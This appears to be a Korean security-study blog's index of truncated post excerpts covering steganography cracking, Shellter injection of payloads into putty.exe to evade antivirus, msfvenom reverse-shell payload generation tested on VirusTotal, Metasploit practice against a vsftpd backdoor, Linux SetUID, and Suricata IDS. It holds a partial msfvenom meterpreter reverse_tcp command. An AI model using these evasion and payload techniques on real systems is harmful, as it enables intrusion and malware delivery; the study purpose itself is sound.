스테가노그래피 - 스테가노그래피 생성 원본 이미지와 사이즈가 변경됨 무조건 데이터와 이미지를 더한 사이즈는 아님 - 스테가노그래피에서 추출 - stegcracker 사용 - crunch로 Dictionary 공격 사전파일 생성 조건 첫번째 글자는 소문자 f로 시작 총 길이는 6글자 ...

Shellter Shellter는 Windows 페이로드를 난독화하여 안티바이러스(AV) 탐지를 우회하도록 설계된 동적 쉘코드 인젝터 Windows 운영체제에서 실해오디는 악성코드를 탐지하기 어렵게 만드는 난독화 도구 악성 페이로드를 정상적인 프로그램에 삽입하고 실행하는 역할 수행 - Shellter 인젝터 쉘코드 인젝션이란 ...

Shellter - 실제 실행 파일에 적용 Putty.exe 파일 사용 인터넷에서 putty 32비트 파일 다운로드 정상파일 탐지 결과 Shellter 실행 Shellter을 이용하여 putty.exe 파일에 페이로드 삽입 생성...

익스플로잇 - 개념 소프트웨어 또는 하드웨어의 취약점을 악용하여 시스템에 무단 접근 공격자가 의도한 동작을 수행하도록 시스템을 조작하는 도구 버퍼 오버플로우, 코드 인젝션, 명령어 삽입 등 다양한 기법 사용 - 종류 원격 익스플로잇: 원격으로 대상 시스템을 공격하는 공격 로컬 익스플로잇: 이미 대상 시스템에 대한 접근 권...

페이로드 - msfvenom 이용 - virustotal로 탐지 검사 생성한 페이로드 파일을 업로드해서 탐지되는지 확인 - 다양한 페이로드 생성 및 검사 윈도우PC를 공격하기 위한 페이로드 파일(exe) 작성 명령어 : msfvenom -p windows/meterpreter/reverse_tcp LHOS...

Metasploit - 구조 - 인터페이스 Msfconsole MSF의 핵심 인터페이스로, 명령줄 기반으로 동작 모든 기능에 접근할 수 있으며, 가장 유연하고 강력함 Armitage GUI 기반 인터페이스 그래픽 환경에서 사용할 수 있어 ...

Msfconsole 실습 - scanner/ssh/ssh_version 모듈 사용 - auxiliary/scanner/ftp/anonymous 모듈 사용 - 익스플로잇 순서 취약점 목록 확인 vsftpd에 백도어 취약점 확인 msfconsole에서 해당 취약점에 대한 모듈 있는지 검색 ...

리눅스의 UID & GID SetUID SetUID가 설정된 파일은 실행 시 파일 소유자의 권한으로 실행됨 실행 파일의 소유자 권한으로 프로그램을 실행할 수 있도록 하는 특수 권한 SetGID SetGID가 설정된 파일은 소유 그룹의 권한으로 실행됨 그룹의 권한으로 프로그램을 실행할 수 있도록 하는 특수 권한 해시...

리눅스의 UID & GID passwd 파일 확인 /etc/passwd 에서 유저 목록 및 아이디 확인 가능 0번 아이디는 루트 권한이므로 주의 필요 User 추가 - SetUID - UID 설정 실습 setuid_test.c 소스코드 ...

Suricata Suricata는 고성능 네트워크 보안 엔진으로, IDS(침입 탐지 시스템), IPS(침입 방지 시스템), 그리고 네트워크 모니터링을 지원함 Suricata는 네트워크 패킷을 검사하여 사전 정의된 규칙에 따라 특정 패턴이나 이상 활동을 탐지하고 이를 차단하거나 기록 주요 기능: 멀티스레딩...